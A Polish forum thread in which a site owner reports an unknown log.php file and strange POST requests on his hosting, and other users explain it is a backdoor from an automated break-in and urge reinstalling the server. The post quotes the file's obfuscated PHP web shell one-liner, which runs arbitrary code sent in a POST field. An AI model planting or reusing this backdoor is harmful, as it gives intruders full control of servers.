Skrypty same się dodają na stronę

0

Witam

Dzisiaj zauważyłem dziwne wpisy w logach na moim hostingu. Na początku było kilka POSTów z chińskiego proxy na adres log.php który był od początku na mojej stronie (nie ja go stworzyłem, już był). Jego zawartość to:

<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['admins']);?>No.1

Potem były różne wejścia na podstrony, o których nikt nie wiedział, zauważyłem też doszło mi na stronie w katalogu głównym kilka rozbudowanych skryptów php. Nie doszły te skrypty tylko w folderach zabezpieczonych w .htaccess. Czy to mogą być jakieś standardowe boty np. od właścicieli mojego hostingu, czy raczej hackerzy?

1
Mały Programista napisał(a):

Witam

Dzisiaj zauważyłem dziwne wpisy w logach na moim hostingu. Na początku było kilka POSTów z chińskiego proxy na adres log.php który był od początku na mojej stronie (nie ja go stworzyłem, już był). Jego zawartość to:

<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['admins']);?>No.1

Potem były różne wejścia na podstrony, o których nikt nie wiedział, zauważyłem też doszło mi na stronie w katalogu głównym kilka rozbudowanych skryptów php. Nie doszły te skrypty tylko w folderach zabezpieczonych w .htaccess. Czy to mogą być jakieś standardowe boty np. od właścicieli mojego hostingu, czy raczej hackerzy?

Bardzo ładny kod log.php - umożliwia wywołanie dowolnego kodu na twoim serwerze.
Wygląda na standardowy włam z automatu. Uratuj dane i stawiaj system na nowo - im szybciej tym lepiej. Najważniejsze pytanie - to jak wleźli... (Jak Ci władowali tego log.php)

0
jarekr000000 napisał(a):

Bardzo ładny kod log.php - umożliwia wywołanie dowolnego kodu na twoim serwerze.

A w jaki sposób? Pytam, bo nie wiem.

0

W tablicy post w indexie admins umieszczany jest złośliwy kod - który jest odpalany przez funkcję assert. Jak widać błędnie zakładałem, że sam dasz radę zrozumieć ten kod.

1
axelbest napisał(a):

W tablicy post w indexie admins umieszczany jest złośliwy kod - który jest odpalany przez funkcję assert. Jak widać błędnie zakładałem, że sam dasz radę zrozumieć ten kod.

Czyli jeden POST na stronę, z kodem w "admins=..tu co mi się podoba.." i jest smutno (albo wesoło).

Generalnie do autora - wyłącz jak najszybciej ten serwer (wyłącz PHP)- bo pewnie w tej chwili jesteś już w jakimś botnecie i twój serwer jest wykorzystywany do przestępstw (mniejszych lub większych - najczęściej spam). Możesz mieć kłopoty : raczej z hostingiem (będzie ip pobanowane), prawne rzadziej.

1 użytkowników online, w tym zalogowanych: 0, gości: 1